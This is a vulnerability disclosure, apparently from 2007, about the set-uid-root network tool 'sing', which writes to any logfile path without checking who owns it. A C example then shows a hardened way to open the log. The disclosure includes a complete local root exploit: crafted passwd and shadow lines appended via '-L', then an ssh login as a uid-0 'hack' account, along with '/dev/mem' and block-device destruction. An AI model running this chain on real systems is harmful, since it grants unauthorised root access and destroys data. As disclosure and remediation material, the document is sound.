Milen Rangelov - 2007-12-03

It seems like sing does not check logfile ownership. If you install it suid root (e.g. from a Debian package), you are taking a great risk.

A malicious local user can use -L /dev/mem and crash the system...or any block device to destroy its data.

The worst is that a carefully crafted command can be used to add a new superuser account to the system, e.g.:

gat3way@gat3way:~$ cat hah

hack:x:0:0:/tmp:/bin/sh

n
gat3way@gat3way:~$ cat hah1

hack:$1$of1h/mN2$p5i.rW0mnhryrG3.zAMIh/:13705:0:99999:7:::

n
gat3way@gat3way:~$ grep hack /etc/passwd
gat3way@gat3way:~$ sing -L /etc/shadow localhost -p "`cat hah1`"
SINGing to localhost (127.0.0.1): 78 data bytes
78 bytes from 127.0.0.1: seq=0 ttl=64 TOS=0 time=0.073 ms

--- localhost sing statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.073/0.073/0.073 ms
gat3way@gat3way:~$ sing -L /etc/passwd localhost -p "`cat hah`"
SINGing to localhost (127.0.0.1): 43 data bytes
43 bytes from 127.0.0.1: seq=0 ttl=64 TOS=0 time=0.083 ms

--- localhost sing statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.083/0.083/0.083 ms
gat3way@gat3way:~$ grep hack /etc/passwd
hack:x:0:0:/tmp:/bin/sh
gat3way@gat3way:~$ ssh hack@localhost
hack@localhost's password:
..
root@gat3way:~# id
uid=0(root) gid=0(root) groups=0(root)
root@gat3way:~#

Just to inform you... I think it could be easily fixed.

Greets :)
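The following is an added example written for this page, not code from sing or its maintainers. It puts the unchecked pattern the report describes (a set-uid-root process appending to whatever path the user named) next to one hardened form: drop the effective uid to the real user for the open() itself, refuse symlinks with O_NOFOLLOW, and verify on the open descriptor (not the path, so there is no race) that the target is a regular file owned by the invoking user. It assumes a POSIX/Linux host, and the function names open_log_unchecked, log_fd_is_owned_by and open_log_as_invoker are invented for the illustration.

```c
/* Added example (not sing's source): how a set-uid-root tool can safely
 * open a caller-supplied log file, next to the unchecked pattern the report
 * above describes.  Assumes a POSIX/Linux host; all function names are ours. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* The risky pattern: with euid 0, append to whatever path the user named.
 * Nothing checks who owns the file, whether it is a symlink, or whether it
 * is a device node, so "-L /etc/passwd" appends the payload to /etc/passwd
 * and "-L /dev/mem" scribbles over kernel memory. */
int open_log_unchecked(const char *path)
{
    return open(path, O_WRONLY | O_APPEND | O_CREAT, 0644);
}

/* Check an already-open descriptor (so there is no path race) for what a
 * log file must be: a regular file owned by the invoking user.  A block
 * device, /dev/mem and a root-owned /etc/shadow all fail here.
 * Returns 1 if acceptable, 0 otherwise. */
int log_fd_is_owned_by(int fd, uid_t owner)
{
    struct stat st;
    if (fstat(fd, &st) < 0)
        return 0;
    return S_ISREG(st.st_mode) && st.st_uid == owner;
}

/* The hardened pattern: temporarily become the real user for the open, so
 * the kernel applies that user's permissions (and any file created belongs
 * to them), refuse symlinks with O_NOFOLLOW, then verify the descriptor.
 * Returns a descriptor >= 0, or -1 with errno set (ELOOP for a symlink,
 * EACCES when the file is not a regular file owned by the caller). */
int open_log_as_invoker(const char *path)
{
    uid_t real_uid = getuid();
    uid_t saved_euid = geteuid();

    if (seteuid(real_uid) < 0)          /* drop root for the duration of open() */
        return -1;
    int fd = open(path, O_WRONLY | O_APPEND | O_CREAT | O_NOFOLLOW, 0600);
    int saved_errno = errno;            /* keep open()'s errno across seteuid() */
    if (seteuid(saved_euid) < 0) {      /* restore the saved euid */
        if (fd >= 0)
            close(fd);
        return -1;
    }
    errno = saved_errno;
    if (fd < 0)
        return -1;

    if (!log_fd_is_owned_by(fd, real_uid)) {
        close(fd);
        errno = EACCES;
        return -1;
    }
    return fd;
}

/* Stand-alone usage: ./a.out <logfile> */
int main(int argc, char **argv)
{
    const char *path = argc > 1 ? argv[1] : "/etc/passwd";
    int fd = open_log_as_invoker(path);
    if (fd < 0) {
        printf("refused %s: %s\n", path, strerror(errno));
        return 1;
    }
    printf("opened %s for logging as uid %d\n", path, (int)getuid());
    close(fd);
    return 0;
}
```

Each of the three checks blocks one of the abuses in the report: S_ISREG rejects /dev/mem and block devices, the ownership test rejects /etc/passwd and /etc/shadow even though root could write them, and O_NOFOLLOW stops a symlink in the user's home pointing at a system file. The cleaner structural fix for a tool like sing is to open the raw socket first and then drop privileges permanently with setuid(getuid()) before touching any file at all; the seteuid dance above is the minimal change when the privileged part cannot be separated out.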